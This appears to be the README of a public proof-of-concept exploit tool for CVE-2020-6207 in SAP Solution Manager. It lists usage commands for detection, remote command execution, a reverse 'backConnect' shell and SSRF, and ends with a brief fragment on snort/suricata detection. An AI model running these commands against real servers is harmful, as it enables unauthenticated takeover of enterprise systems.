PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager)


PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager)
This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager
Original finding:

Paper: An Unauthenticated Journey to Root :Pwning Your Company's Enterprise Software Servers
Solution: sap note 2890213

Follow me in Twitter: @chipik

This project is created only for educational purposes and cannot be used for law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials of this project


You will find vulnerabilities details in process article

How to use

Just point SAP Solution Manager hostnmae/ip.


➜ python sol-rce.py -H -P 50000 -c
Vulnerable! [CVE-2020-6207] -

Trigger RCE

➜ python sol-rce.py -H -P 50000 --rce calc.exe


Get BackConnect

➜ python sol-rce.py -H -P 50000 --back


➜ python sol-rce.py -H -P 50000 --ssrf


There is additional options:

➜ python sol-rce.py -h

usage: sol-rce.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-d VICTIM]
                  [--ssrf SSRF] [--rce RCE] [--back BACK] [--setup SETUP]
                  [--list] [--clear] [-t TIMEOUT] [-v]

PoC for CVE-2020-6207, (Missing Authentication Check in SAP Solution Manager)
This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy

Paper: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
Solution: https://launchpad.support.sap.com/#/notes/2890213

twitter: https://twitter.com/_chipik

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  SAP Solution Manager host(default:
  -P PORT, --port PORT  SAP Solution Manager web port (default: tcp/50000)
  -p PROXY, --proxy PROXY
                        Use proxy (ex:
  -s, --ssl             enable SSL
  -c, --check           just detect vulnerability
  -d VICTIM, --victim VICTIM
                        DA serverName
  --ssrf SSRF           exploit SSRF. Point http address here. (example:
  --rce RCE             exploit RCE
  --back BACK           get backConnect from DA. (ex:
  --setup SETUP         setup a random serverName to the DA with the given hostName and instanceName. (example: javaup.mshome.net,SMDA97)
  --list                Get a list of existing DA servers
  --clear               stop and delete all PoCScript scripts from DA servers
  -t TIMEOUT, --timeout TIMEOUT
                        HTTP connection timeout in second (default: 10)
  -v, --verbose         verbose mode
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    This is an attempt to catch exploitation attempts of this vulnerability with snort/suricata in two manner:

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    • Detect straightforward Java code injection. This is much likely to be obfuscated by an attacker, but let's catch those opportunistic one at least

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